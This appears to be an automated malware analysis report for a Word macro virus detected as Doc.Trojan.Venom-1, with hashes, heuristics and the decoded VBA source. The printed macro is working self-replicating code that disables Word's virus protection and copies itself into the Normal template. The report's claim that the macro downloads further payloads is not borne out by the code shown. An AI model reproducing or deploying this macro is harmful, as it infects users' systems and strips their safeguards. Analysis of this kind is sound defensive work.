Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7cb3a882cb06ff26…

MALICIOUS

Office (OLE)

37.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 20e46f7b587a697b2e5fec13d20162b4 SHA-1: f9a52d03bbaf56d2442255a169c40da8a2a17020 SHA-256: 7cb3a882cb06ff2603a95b5dfbb1264343b1e693bb60071bae3c6311ea2f16cf
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Venom-1'. It contains VBA macros, including a 'Document_Open' macro, which is a common technique for executing malicious code upon opening the document. The script attempts to disable macro security features and modify the document's structure, suggesting it's designed to download and execute further payloads.

Heuristics 3

  • ClamAV: Doc.Trojan.Venom-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Venom-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14458 bytes
SHA-256: c907d43947f004939a1c8a02e3d38cd6ab558be38969db93a4475c97fda22d53
Detection
ClamAV: Doc.Trojan.Venom-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Venom7"
Attribute VB_Base = "1Normal.Venom7"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_New()
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

If ADI1.Name <> "Venom7" Then
    If ADCL > 0 Then
        Dim f As Long
        For f = 1 To ADCL
            On Error Resume Next
            ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines f, 1
        Next f
        ADI1.Name = "Venom7"
        DoAD = True
    Else
        ADI1.Name = "Venom7"
        DoAD = True
    End If
End If

If NTI1.Name <> "Venom7" Then
    If NTCL > 0 Then
        Dim i As Long
        For i = 1 To NTCL
            On Error Resume Next
            NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i, 1
        Next i
        NTI1.Name = "Venom7"
        DoNT = True
    Else
        NTI1.Name = "Venom7"
        DoNT = True
    End If
End If
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoAD = True Then
    For hunger = NTCL To 1 Step -1
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
    docname = Left$(ActiveDocument.Name, 8)
    If docname <> "Document" Then
    ActiveDocument.Save
    End If
End If

If DoNT = True Then
    For hunger = ADCL To 1 Step -1
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
End If



CYA:
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."

End Sub

Private Sub Document_Open()

CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

If ADI1.Name <> "Venom7" Then
    If ADCL > 0 Then
        Dim f As Long
        For f = 1 To ADCL
            On Error Resume Next
            ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines f, 1
        Next f
        ADI1.Name = "Venom7"
        DoAD = True
    Else
        ADI1.Name = "Venom7"
        DoAD = True
    End If
End If

If NTI1.Name <> "Venom7" Then
    If NTCL > 0 Then
        Dim i As Long
        For i = 1 To NTCL
            On Error Resume Next
            NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i, 1
        Next i
        NTI1.Name = "Venom7"
        DoNT = True
    Else
        NTI1.Name = "Venom7"
        DoNT = True
    End If
End If
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoAD = True Then
    For hunger = NTCL To 1 Step -1
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
    ActiveDocument.Save
End If

If DoNT = True Then
    For hunger = ADCL To 1 Step -1
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
End If



CYA:
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.